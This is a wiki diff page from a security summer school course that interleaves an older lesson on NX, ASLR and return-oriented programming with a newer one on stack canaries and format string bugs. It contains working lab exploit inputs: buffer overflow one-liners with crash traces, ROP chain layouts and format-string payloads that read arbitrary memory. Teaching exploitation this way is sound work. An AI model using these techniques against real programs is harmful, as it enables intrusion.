User Tools

Site Tools


session:11

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
session:11 [2020/07/08 09:18]
Liza-Elena BABU (78556) [Executable Space Protection]
session:11 [2020/07/19 12:49] (current)
Line 1: Line 1:
-0x08. Return Oriented Programming+====== 0x0A: Information Leaks ======
  
-== Resources+===== Slides =====
  
-[[https://security.cs.pub.ro/summer-school/res/slides/11-return-oriented-programming.pdf|Session 11 slides]]+===== Resources =====
  
-[[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-skel.zip|Session's tutorials and challenges archive]]+[[https://security.cs.pub.ro/summer-school/res/slides/10-information-leaks.pdf|Session 10 slides]]
  
-[[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-full.zip|Session'solutions]]+[[https://github.com/hexcellents/sss-exploit/tree/master/sessions|Session'tutorials and challenges archive]]
  
 +===== Stack Protection (Canaries) =====
  
-=== Executable Space Protection+The name comes from canaries (birds) that were used by mining workers when entering mines and were affected by any deadly gases such as methane before humans were. In our case, stack canaries are used to check if a buffer overflow of a stack variable resulted in overriding the return address. The mechanism is based on a (sometimes random) value that is placed on each function's stack, just above the return address, as the following picture shows. The value is checked in the function's epilogue before calling ''ret'', and if the values do not match the execution is halted. Since the stack grows from higher memory addresses to lower ones, any buffer overflow targeting the return address will also have to overwrite the canary with the right value.
  
-The **executable space protection** is an instance of the **principle of least privilege**, which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e., page) can have the following protection levelsREAD, WRITE, and EXECUTE. The executable space protection mandates that writable regions should not be executable at the same time.+{{ :session:canary.png?nolink&248 |}}
  
-The mechanism can be (and was) implemented in many different ways, the most common in Linux being:+There are 3 main variations of this mechanism: //random//, //terminator//, and //random XOR//.
  
-**NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is current implementation in 64-bit processors where page table entries are 8-bytes wide.+**Random** canaries are generated when programs start, and are stored in a global variable. The global variable //can// be located in a memory region surrounded by unmapped pages - this protects against information leak attacks (see next section) that dump big memory chunks, since accessing the unmapped pages will trigger a segmentation fault. This first method is a little bit hard to implement because the //crt0.o// code (see note below) has to read ''/dev/random''.
  
-**Physical Address Extension (PAE):** Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds NX bit in its page table entries.+The **terminator** canaries contain string termination characters such as ''0x00'', ''CR'', ''LF'', or ''-1''. This is based on the assumption that most buffer overflows happen when string manipulation functions (e.g.''strcpy()'') are called with bad arguments. One would want to leak the canary value and then use buffer overflow to overwrite it with the same value. Because string manipulation functions usually stop when termination characters are encountered, it is difficult to use them to overwrite the same value (containing termination characters) over the canary.
  
-**Emulation:** The NX bit can be emulated on older (i.e.non-PAE) 32-bit processors by overloading the Supervisor bit ([[http://en.wikipedia.org/wiki/PaX#PAGEEXEC|PaX PAGEEXEC]])or by using the segmentation mechanism and splitting the address space in half ([[http://en.wikipedia.org/wiki/PaX#SEGMEXEC|PaX SEGMEXEC]]).+The **random XOR** canaries work by applying a XOR-based algorithm having both a random number (the canary)and the correct address as inputsThe attacker has to both obtain the random number, and apply the algorithm on the new return address before building the payload.
  
 <note> <note>
-This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode. +**crt0.o** is a set of initialization routines linked into compiled C programs, and executed before calling ''main()''. [[http://en.wikipedia.org/wiki/Crt0|More details.]]
- +
-    * Slides: [[http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf|Black Hat & DEF CON 2010]] +
-    * Paper: [[http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf|Interpreter Exploitation. Pointer Inference and JIT Spraying]] +
 </note> </note>
  
-There are of course other implementations in different hardening-oriented projects such asOpenBSD [[http://marc.info/?l=openbsd-misc&m=105056000801065|W^X]]Red Hat [[http://www.redhat.com/magazine/009jul05/features/execshield/|Exec Shield]]PaX (which is now part of [[https://grsecurity.net/|grsecurity]]), Windows Data Execution Prevention ([[http://support.microsoft.com/kb/875352|DEP]]).+The 3 well known implementations of stack protections are: StackGuardProPoliceand StackShield.
  
-=== Bypassing NX+==== StackGuard ====
  
-**ret-to-plt/libc.** You can return to the ''.plt'' section and call library function already linkedYou can also call other library functions based on their known offsetsThe latter approach assumes no ASLR (see next section)or the possibility of an information leak (will be discussed in the Information Leak session). +The [[https://www.usenix.org/legacy/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html|initial implementation]] proposed by Crispin Cowan et al. from Immunix Inc., only protected the return address by pushing the canary value on the stack right after it (at lower adresses in memory, just like in the picture). Follow-up versions also protected the saved registers and base pointerStackGuard is implemented as patch for the GCC compiler that modifies the GCC's code generation routines for function prologues and epiloguesThe prologue will push the random value onto the stack, while the epilogue will contain a short value checking code.
- +
-**Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section. +
- +
-**mprotect().** If the application is using ''mprotect()'' you can easily call it to modify the permissions and include ''PROT_EXEC'' for the stackYou can also call this in a ''ret-to-libc'' attack. You can also ''mmap'' a completely new memory region and dump the shellcode there. +
- +
-<note> +
-Today we will talk about the first 2 methods to bypass NX. **mprotect()** will be introduced in the next sessions. +
-</note> +
- +
-=== Address Space Layout Randomization (ASLR) +
- +
-Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions of an executable at random addresses. This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary)Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for [[http://en.wikipedia.org/wiki/Position-independent_executable|PIE]] binaries.+
  
 <note important> <note important>
-Linux allows 3 options for its ASLR implementation that can be configured using the ''/proc/sys/kernel/randomize_va_space'' fileWriting 0, 1, or 2 to this will results in the following behaviors: +[[http://courses.cs.washington.edu/courses/cse504/10sp/Slides/lecture3.pdf|Presentation]] on the history of StackGuard by Crispin Cowan.
-  * **0**: deactivated +
-  * **1**: random stack, vdso, libraries; heap is after code section; random code section (only for PIE-linked binaries) +
-  * **2**: random heap too +
 </note> </note>
  
-Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below.+==== StackShield ====
  
-If you disabled ASLR system-widere-enable it using (root access is required):+The most notable feature of StackShieldcompared to other implementations, is the //Global Return Stack//. This is a separate memory structure where return addresses are pushed as function are being called. When the function returns, the correct value is copied back to the application stack, thus overriding any malicious value. //Ret Range Check// is another feature that allows stack smashing detection by copying return addresses from the application stack to a memory region with no write permission the value is compared to the current return address in function's epilogue.
  
-<code bash> +==== ProPolice ====
-~$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space' +
-</code>+
  
-If you disabled ASLR at shell levelsimply **close the shell** such as issuing the ''Ctrl+d'' keyboard shortcut.+ProPoliceproposed by IBM, started from an implementation similar to StackGuard, but evolved and introduced new features. It is currently the method used by GCC when the ''%%--fstack-protector%%'' compilation flag is used. The ProPolice mechanism will reorder local variables based on their types. The following picture shows where each variable should be placed on the stack based on it's type such that different attacks become impossible.
  
-We can easily demonstrate the effects on shared libraries by running ''ldd'' multiple times in a row on a binary such as ''/bin/ls''.+{{ :session:propolice_stack.jpg?nolink&400 |}}
  
-==== PLT and GOT+<note> 
 +GCC supports 3 levels of stack smashing protection: complete, normal, and strong. The difference lies in the types of function that are protected, with the decision being made by looking at what kinds of local variables are used. Details in [[http://lwn.net/Articles/584225/|this]] LWN article. 
 +</note>
  
-ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign address to libraries in a round-robin fashion, or could use ASLR to assign them randomly.+Let's compile small application with GCC's stack protection.
  
-Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the ''.text'' section, which should only be **readable** and **executable**.+<file c ssp.c> 
 +void func() { 
 +    char buffer[1337]; 
 +    return; 
 +}
  
-To solve this problems we need another level of indirection: all memory accessed to symbols located in shared libraries will read the actual address from a table, called **Global Offset Table (''.got'')**, at runtime. The loader will populate this table. Note that this can work both for data accesses, as well as for function calls, however function calls are actually using a small stub (i.e., a few instructionsstored in the **Procedure Linkage Table (''.plt'')**.+int main() 
 +    func()
 +    return 0; 
 +
 +</file>
  
-The PLT is responsible of finding the shared library function address when it is first called (**lazy binding**), and writing it to a GOT entry. Note that the function pointers are stored in ''.got.plt''). The following calls use the pre-resolved address. +Compile the file using:
- +
-Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls ''puts()''.+
  
 <code bash> <code bash>
-~$ objdump --j .text -M intel hello | grep puts       +~$ CFLAGS='-O0 -m32 -fstack-protector' make ssp
-</code> +
-<code text> +
- 80483e4: e8 07 ff ff ff        call   80482f0 <puts@plt>+
 </code> </code>
  
-We can see that the ''.plt'' section will start at address ''0x080482e0'', right where the previous call will jump:+The disassembled code for ''func()'' looks like this:
  
 <code bash> <code bash>
-~$ readelf --sections hello+~$ objdump -M intel -d -j .text ./ssp
 </code> </code>
  
-<code text+<code objdump
-... +0804841b <func>: 
-  [12.plt              PROGBITS        080482e0 0002e0 000040 04  AX  0   0 16 + 804841b: 55                    push   ebp 
-...+ 804841c: 89 e5                mov    ebp,esp 
 + 804841e: 81 ec 48 05 00 00    sub    esp,0x548 
 + 8048424: 65 a1 14 00 00 00    mov    eax,gs:0x14 
 + 804842a: 89 45 f4              mov    DWORD PTR [ebp-0xc],eax 
 + 804842d: 31 c0                xor    eax,eax 
 + 804842f: 90                    nop 
 + 8048430: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc] 
 + 8048433: 65 33 05 14 00 00 00 xor    eax,DWORD PTR gs:0x14 
 + 804843a: 74 05                je     8048441 <func+0x26> 
 + 804843c: e8 af fe ff ff        call   80482f0 <__stack_chk_fail@plt
 + 8048441: c9                    leave   
 + 8048442: c3                    ret 
 </code> </code>
  
-Let'see how the code there looks like:+We can observe the random value being read from ''gs:0x14'' and placed on the stack after the return value. Let'take a look at this in GDB for multiple run. Start by creating a small GDB script that can be easily executed multiple times.
  
-<code bash+<file text canary.gdb
-~$ objdump -D -j .plt -intel hello | grep -A 3 '<puts@plt>' +set disassembly-flavor intel 
-</code> +file ssp 
- +break *0x804842a 
-<code text> +commands 
-080482f0 <puts@plt>: +p/x $eax 
- 80482f0: ff 25 00 a0 04 08    jmp    DWORD PTR ds:0x804a000 +c 
- 80482f6: 68 00 00 00 00        push   0x0 +end 
- 80482fb: e9 e0 ff ff ff        jmp    80482e0 <_init+0x30> +run 
-</code>+quit 
 +</file>
  
-We see it jumping to a pointer stored at ''0x804a000'' in the data section. Let's check the binary relocations for that location:+Run using:
  
 <code bash> <code bash>
-~$ readelf --relocs hello+~$ gdb -x canary.gdb ssp
 </code> </code>
  
-<code text> +==== Defeating Canaries ====
-... +
-Relocation section '.rel.plt' at offset 0x298 contains 3 entries: +
- Offset     Info    Type            Sym.Value  Sym. Name +
-0804a000  00000107 R_386_JUMP_SLOT   00000000   puts +
-... +
-</code>+
  
-Okgoodbut what is actually stored at this address initially?+This [[http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-silberman/bh-us-04-silberman-paper.pdf|white paper]] covers different attack vectors and the capabilities of protecting against these offered by the 3 implementations that we previously presented. As the paper presentsthere are multiple target values that an attacker might want to modify during exploitationby overflowing buffers stored in different regions of the process. 
  
-<code bash> +For example, the attacker might target: 
-~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello +  * parameters function pointers (pushed onto the stack before calling functions) 
-</code>+  * the return address 
 +  * the old base pointer 
 +  * a plain function pointer (local variable)
  
-<code text> +Buffers could be stored either on the stack, the heap or ''.bss'' section.
-hello:     file format elf32-i386+
  
-Contents of section .got.plt: +<note important> 
- 804a000 f6820408 06830408 16830408           ............ +Note that attacks can also be carried out via indirect pointersThe attacker could target a stack local variable, without trying to change the return value, that is later used as a pointer in a write operationIf this write can be fully controlled, the attacker can change the return address without even writing over the canary
-</code>+</note>
  
-We recognize ''f6820408'' (''0x80482f6'') as being the next instruction in the ''puts@plt'' stub that we disassembled above. Which then pushes 0 in the stack and calls ''0x80482e0''. This is the call to the one-time resolver, and it looks like this:+Besides indirect attacks, stack canaries can also be defeated if the attacker is able to exploit an **information leak** vulnerability.
  
-<code bash> 
-~$ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0' 
-</code> 
  
-<code text> +===== Format String Exploits =====
-080482e0 <puts@plt-0x10>: +
- 80482e0: ff 35 f8 9f 04 08    push   DWORD PTR ds:0x8049ff8 +
- 80482e6: ff 25 fc 9f 04 08    jmp    DWORD PTR ds:0x8049ffc +
- 80482ec: 00 00                add    BYTE PTR [eax],al +
-</code>+
  
-<note> +<note warning
-Going further into the resolver is left as an exerciseYou can use GDB to inspect the address in ''0x8049ffc'', and what happens when this jumps there.+In the following, ''top of the stack'' refers to ''high addresses'' (fixed), whereas ''bottom of the stack'' refers to ''low addresses'' (the end where values are pushed on the stack), contrary to the intuition that the top of the stack is the end at which values are pushedThis means high addresses are represented upwards, whereas low addresses are represented downwards (contrary to the ''GDB'' layout of the stack). 
 +This formality arises from this paper on [[https://cs155.stanford.edu/papers/formatstring-1.2.pdf|Exploiting Format String Vulnerabilities]], from which the following tutorial was adapted.
 </note> </note>
  
-What's going on here? What's actually happening is //lazy binding// — by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instruction. The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo"It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stubIngenious!+The scenario that enables format string vulnerabilities is the direct use of unsanitized user provided input as parameter to functions that can perform special operations based on that input 
 +Eg
  
-=== 00. Tutorial - Bypass NX Stack with return-to-libc+<code C> 
 +void print_something(char* user_input) 
 +
 +    printf(user_input); 
 +
 +</code>
  
-Go to the ''01-tutorial-ret-to-libc/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].+vs.
  
-In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process (on its stackand redirect execution to it. This attack is easily defeated by making the stack, together with any other memory page that can be modified, non-executable. This is achieved by setting the NX bit in the page table. +<code C> 
- +void print_something(char* user_input
-We will try to bypass this protection for the ''01-tutorial-ret-to-libc/src/auth'' binary in the lab archive. Build the auth program or use the already compiled one. For nowdisable ASLR in the a new shell: +{ 
- +    printf("%s"user_input); 
-<code> +}
-setarch $(uname -m) -R /bin/bash+
 </code> </code>
 +==== Format functions ====
 +A number of format functions are defined in the ANSI C definition. There are some basic format string functions on which more complex functions are based on, some of which are not part of the standard but are widely available.
 +Real family members:
 + * fprintf — prints to a FILE stream
 + * printf — prints to the ‘stdout’ stream
 + * sprintf — prints into a string
 + * snprintf — prints into a string with length checking
 + * vfprintf — print to a FILE stream from a va_arg structure
 + * vprintf — prints to ‘stdout’ from a va_arg structure
 + * vsprintf — prints to a string from a va_arg structure
 + * vsnprintf — prints to a string with length checking from a va_arg structure
  
-Let's take a look at the program headers and confirm that the stack is no longer executable. We only have read and write (RW) permissions for the stack area.+== Relatives: == 
 + * setproctitle — set argv[] 
 + * syslog — output to the syslog facility 
 + * others like err*, verr*, warn*, vwarn*
  
-<note important> +=== Use of format functions === 
-The auth binary requires the ''libssl1.0.0:i386'' Debian package to work. Recompiling it requires ''libssl-dev:i386''which might remove ''gcc''. So make sure you also install ''gcc'' afterwards.+To understand where this vulnerability is common in C codewe have to examine the purpose of format functions.
  
-You can find ''libssl1.0.0:i386'' Debian package [[https://packages.debian.org/jessie/i386/libssl1.0.0/download | here ]]. +== Functionality == 
-</note>+ * used to convert simple C datatypes to a string representation 
 + * allow to specify the format of the representation 
 + * process the resulting string (output to stderr, stdout, syslog, ...)
  
-<code bash> +== How the format function works == 
-$ checksec 1-random + * the format string controls the behaviour of the function 
-    [...] + * it specifies the type of parameters that should be printed 
-    NX:       NX enabled + parameters are saved on the stack (pushed
-    [...] + * saved either directly (by value), or indirectly (by reference)
-</code> +
-For completeness, lets check that there is indeed a buffer (stack) overflow vulnerability. +
-<code> +
-$ python -c 'print "A" 1357' | ltrace -i ./auth +
-[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...> +
-[0x8048601] malloc(20                                                                           = 0x0804b008 +
-[0x80485df] puts("Enter password: "Enter password:  +
-                                                             = 17 +
-[0x80485ea] gets(c0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7)                        = 0xbfffee63 +
-[0x8048652] memset(0x0804b008, '\000', 20                                                       = 0x0804b008 +
-[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x41000001)                                       = 0x804b008 +
-[0x41414141] --- SIGSEGV (Segmentation fault) --- +
-[0xffffffff] +++ killed by SIGSEGV +++ +
-</code>+
  
-Check the source file - the buffer length is ''1337'' bytes. There should be a base pointer and the ''main()'''s return address just before it on the stack. There is also some alignment involvedbut we can easily try a few lengths to get the right position of the return address. Seems to be ''1337 + 16'' followed by the return address for this case. You canof course, determine the distance between the buffer's start address and the frame's return address exactly using ''objdump'', but we will leave that as an exercise.+== The calling function == 
 + * has to know how many parameters it pushes to the stack, since it has to do the stack correctionwhen the format function returns
  
-We can now jump anywhere. Unfortunately, we cannot put a shellcode in the buffer and jump into it because the stack is non-executable now. Lets try it with few NOPs. Our buffer's address is ''0xbfffee63'' (see the ''gets()'' call)+=== What exactly is a format string === 
-<code> +A format string is an ASCIIZ string that contains text and format parameters. 
-$ python -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | ltrace -i ./auth +Example: 
-[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...> +<code C
-[0x8048601] malloc(20)                                                                            = 0x0804b008 +printf ("The magic number is%d\n", 1911);
-[0x80485df] puts("Enter password: "Enter password:  +
-)                                                              = 17 +
-[0x80485ea] gets(0xbfffee630x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7                       = 0xbfffee63 +
-[0x8048652] memset(0x0804b008, '\000', 20)                                                        = 0x0804b008 +
-[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x90000001)                                       = 0x804b008 +
-[0xbfffee63] --- SIGSEGV (Segmentation fault) --- +
-[0xffffffff] +++ killed by SIGSEGV ++++
 </code> </code>
-Oh, such a bummer! It didn't work. How about we try to jump to some existing code? +The text to be printed is "The magic number is:", followed by a format parameter ("%d"), that is replaced with the parameter (1911in the output. Therefore the output looks like
-<code> +<code>The magic number is1911</code>
-$ objdump -d auth | grep -A 15 "<check_password>:" +
-080485ec <check_password>: +
- 80485ec: 55                    push   %ebp +
- 80485ed: 89 e5                mov    %esp,%ebp +
- 80485ef: 81 ec 58 05 00 00    sub    $0x558,%esp +
- 80485f5: c7 04 24 14 00 00 00 movl   $0x14,(%esp) +
- 80485fc: e8 9f fe ff ff        call   80484a0 <malloc@plt> +
- 8048601: a3 38 a0 04 08        mov    %eax,0x804a038 +
- 8048606: a1 38 a0 04 08        mov    0x804a038,%eax +
- 804860b: 85 c0                test   %eax,%eax +
- 804860d: 75 18                jne    8048627 <check_password+0x3b> +
- 804860f: c7 04 24 76 87 04 08 movl   $0x8048776,(%esp) +
- 8048616: e8 95 fe ff ff        call   80484b0 <puts@plt> +
- 804861b: c7 04 24 01 00 00 00 movl   $0x1,(%esp) +
- 8048622: e8 99 fe ff ff        call   80484c0 <exit@plt> +
- 8048627: 8d 85 bb fa ff ff    lea    -0x545(%ebp),%eax +
- 804862d: 89 04 24              mov    %eax,(%esp) +
-</code> +
-Lets try ''0x804860f'' such that we print the ''malloc'' failure message. +
-<code> +
-$ python -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./auth +
-[0x80485df] puts("Enter password: "Enter password:  +
-)                                                              = 17 +
-[0x804861b] puts("malloc failed"malloc failed +
-)                                                                 = 14 +
-[0xffffffff] +++ exited (status 1) ++++
  
-</code> +Some format parameters:
-=== Return Oriented Programming+
  
-{{ :session:rop.png?nolink&600 |}}+^ Parameter      ^ Output       ^ Passed as          ^ 
 +| %d    | decimal(int)     | value        | 
 +| %u    | unsigned decimal (unsigned int)     | value        | 
 +| %x    | hexadecimal (unsigned int)     | value        | 
 +| %s    | string ( char *)     | reference        | 
 +| %n    | number of bytes written so far, (* int)     | reference        |
  
-==== Motivation +The '\character is used to escape special characters. It is replaced by the C compiler at compile-time, replacing the escape sequence by the appropiate character in the binary. The format functions do not recognize those special sequences. In fact, they do not have anything to do with the format functions at all, but are sometimes mixed up, as if they are evaluated by them. 
-In the previous sessions we discussed ''ret2libc'' attacks. The standard attack was to overwrite in the following way+Example
-<code> +<code C
-RET + 0x00  addr of system +printf ("The magic number is\x25d\n", 23);
-RET + 0x04:   JUNK +
-RET + 0x08:   address to desired command (e.g. '/bin/sh')+
 </code> </code>
 +The code above works, because '\x25' is replaced at compile time with '%', since 0x25 (37) is the ASCII value for the percent character.
  
-However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be: +==== The stack and its role at format strings ==== 
-<code> +The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack. 
-RET + 0x00:   addr of f1 +<code C
-RET + 0x04:   addr of f2 (return address after f1 finishes) +printf ("Number %d has no addressnumber %d has: %08x\n"i, a, &a);
-RET + 0x08:   JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) +
-RET + 0x0c:   0xAB (param1 of f2) +
-RET + 0x10:   0xCD (param2 of f2) +
-</code> +
-What about if we need to call f1(0xAB0xCD) and then f2(0xEF0x42) ? +
-<code> +
-RET + 0x00:   addr of f1 +
-RET + 0x04:   addr of f2 (return address after f1 finishes) +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2) +
-RET + 0x10:   0x42 (param2 of f2+
 </code> </code>
  
-This kind of conflict can be resolved using Return Oriented Programming, a generalization of ''ret2libc'' attacks.+From within the ''printf'' function the stack looks like : 
 +{{ :session:format_string_stack.png?direct&300 |}}
  
-==== NOP analogy +The format function now parses the format string 'A', by reading a character a time. If it is not '%', the character is copied to the outputIn case it is, the character behind the '%' specifies the type of parameter that 
-While ''ret2libc'' uses functions directlyReturn Oriented Programming uses a finer level of code execution: instruction groups. +should be evaluated. The string "%%" has special meaningit is used to print the escape character '%' itself. Every other parameter relates to datawhich is located on the stack.
-Let's explore an example: +
-<code c> +
-int main() +
-+
- char a[16]; +
- read(0a100);+
  
- return 0; +==== What do we control? ==== 
-}+Through supplying the format string we are able to control the behaviour of the format function. We now have to examine what exactly we are able to control, and how to use this control to extend this partial control over 
 +the process to full control of the execution flow. 
 +==== Crash of the program ==== 
 +By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like: 
 +<code C> 
 +printf ("%s%s%s%s%s%s%s%s%s%s%s%s");
 </code> </code>
-This code obviously suffers from a stack buffer overflow. The offset to the return address is 28So dwords from offset 28 onwards will be popped from the stack and executed. +Because '%s' displays memory from an address that is supplied on the stack, where lot of other data is stored, too, our chances are high to read from an illegal address, which is not mappedAlso most format function 
-Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions ("\x90") used to pad payload for alignment purposes+implementations offer the '%n' parameter, which can be used to write to the addresses on the stack. If that is done few times, it should reliably produce a crash, too
-Since we can't add any new code to the program (NX is enabled) how could we simulate the effect of NOP sled? Easy! Using return instructions! +==== Viewing the stack ==== 
-<code> +We can show some parts of the stack memory by using format string like this: 
-# objdump  -d a -M intel | grep $'\t'ret +<code C
- 80482dd: c3                    ret     +printf ("%08x.%08x.%08x.%08x.%08x\n");
- 804837a: c3                    ret     +
- 80483b7: c3                    ret     +
- 8048437: c3                    ret     +
- 8048444: c3                    ret     +
- 80484a9: c3                    ret     +
- 80484ad: c3                    ret     +
- 80484c6: c3                    ret    +
 </code> </code>
-Any and all of these addresses will be okThe payload could be the following:+This works, because we instruct the printf-function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbersSo a possible output may look like:
 <code> <code>
-RET + 0x00:   0x80482dd +40012980.080628c4.bffff7a4.00000005.08059c04
-RET + 0x04:   0x80482dd +
-RET + 0x08:   0x80482dd +
-RET + 0x0c:   0x80482dd +
-RET + 0x10:   0x80482dd +
-.....+
 </code> </code>
-The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to itWhen it gets popped the stack is automatically increased by 4 (on to the next value)The instruction at ''0x80482dd'' is another ''ret'' which does the same thing as before. This goes on until another address is popped off the stack that is not a ''ret''.+This is a partial dump of the stack memory, starting from the current bottom of the stack towards the top — assuming the stack grows towards the low addressesDepending on the size of the format string buffer and the size of the output buffer, you can reconstruct more or less large parts of the stack memory by using this technique. In some cases you can even retrieve the entire stack memory. 
 +A stack dump gives important information about the program flow and local function variables and may be very helpful for finding the correct offsets for a successful exploitation. 
 +==== Viewing memory at any location  ==== 
 +It is also possible to peek at memory locations different from the stack memory. To do this we have to get the format function to display memory from an address we can supply 
 +This poses two problems to us:  
 +  * First, we have to find a format parameter which uses an address (by reference) as stack parameter and displays memory from there 
 +  * Secondly, we have to supply that address.  
 +We are lucky in the first case, since the '%sparameter just does that, it displays memory — usually an ASCIIZ string — from a stack supplied address.  
 +So the remaining problem is, how to get that address on the stack, into the right place.
  
-That payload is not the only option. We don't really care which ''ret'' we pick. The payload could very well look like this: 
-<code> 
-RET + 0x00:   0x80482dd 
-RET + 0x04:   0x804837a 
-RET + 0x08:   0x80483b7 
-RET + 0x0c:   0x8048437 
-RET + 0x10:   0x80484c6 
-..... 
-</code> 
-Notice the addresses are different but because they all point to a ''ret'' instruction they will all have the same net effect on the code flow. 
  
-<note warning> +Our format string is usually located on the stack itself, so we already have near to full control over the space where the format string lies. 
-Take moment to fully understand what is happening here. Run your own program and step through the payload to see this in action before proceeding+The format function internally maintains pointer to the stack location of the current format parameter.  
-Follow along using this skeleton to generate the payloads.+If we would be able to get this pointer pointing into a memory space we can control, we can supply an address to the '%s' parameter.  
 +<note important> 
 +For re-creating the following attack you should place the string passed to ''printf'' using a local buffer. In the following examples the string is used as it is to simplify the situation, but at compile time the string will be placed on the ''.rodata'' section and the desired address won't be on the stack so it can be used (also true for dummy parameters).
 </note> </note>
-<file python skel.py+To modify the stack pointer we can simply use dummy parameters that will 'dig' up the stack by printing junk: 
-#!/usr/bin/python +<code C
-import structsys+printf ("AAA0AAA1_%08x.%08x.%08x.%08x.%08x"); 
 +</code> 
 +The '%08x' parameters increase the internal stack pointer of the format function towards the top of the stack.  
 +After more or less of this increasing parameters the stack pointer points into our memory: the format string itself.  
 +The format function always maintains the lowest stack frameso if our buffer lies on the stack at all, it lies above the current stack pointer for sure.  
 +If we choose the number of ‘%08x’ parameters correctly, we could just display memory from an arbitrary address, by appending '%s' to our string.
  
-def dw(i): +In our case the address is illegal and would be 'AAA0'Lets replace it with a real one. 
- return struct.pack("<I", i)+Example:
  
-#TODO update count for your prog 
-pad_count_to_ret = 100 
-payload = "X" * pad_count_to_ret 
- 
-#TODO figure out the rop chain 
-payload += dw(0xcafebeef) 
-payload += dw(0xdeadc0de) 
- 
- 
-sys.stdout.write(payload) 
- 
-</file> 
- 
- 
-==== Gadgets & ROP chains 
-Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful. 
-The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a 'ret' instruction. 
-Here are some 'gadgets' from the previous program: 
 <code> <code>
-0x8048443: pop ebp; ret +address = 0x08480110 
-0x80484a7: pop edi; pop ebp; ret +address (encoded as 32 bit le string)"\x10\x01\x48\x08"
-0x8048441: mov ebp,esp; pop ebp; ret +
-0x80482da: pop eax; pop ebx; leave; ret +
-0x80484c3pop ecx; pop ebx; leave; ret+
 </code> </code>
  
-By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. +<code C
-As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like: +printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
-<code> +
-RET + 0x00:   0x80482da  (pop eaxpop ebx; leave; ret) +
-RET + 0x04:   0x41424344 +
-RET + 0x08:   0x61626364 +
-RET + 0x0c:   0xAABBCCDD ???+
 </code> </code>
-  * First the ret addr is popped from the stack and execution goes there. 
-  * At ''pop eax'' 0x41424344 is loaded into eax and the stack is increased 
-  * At ''pop ebx'' 0x61626364 is loaded into ebx and the stack is increased again 
-  * At ''leave'' two things actually happen: "mov esp, ebp; pop ebp". So the stack frame is decreased to the previous one (pointed by ebp) and ebp is updated to the one before that. So esp will now be the old ebp+4 
-  * At ''ret'' code flow will go to the instruction pointed to by ebp+4. This implies that execution will __not__ go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain. 
  
-We have now seen how gadgets can be useful if we want the CPU to achieve certain state. This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers. +This will dump memory from 0x08480110 until a NULL byte is reached. By increasing the memory address dynamically we can map out the entire process space.  
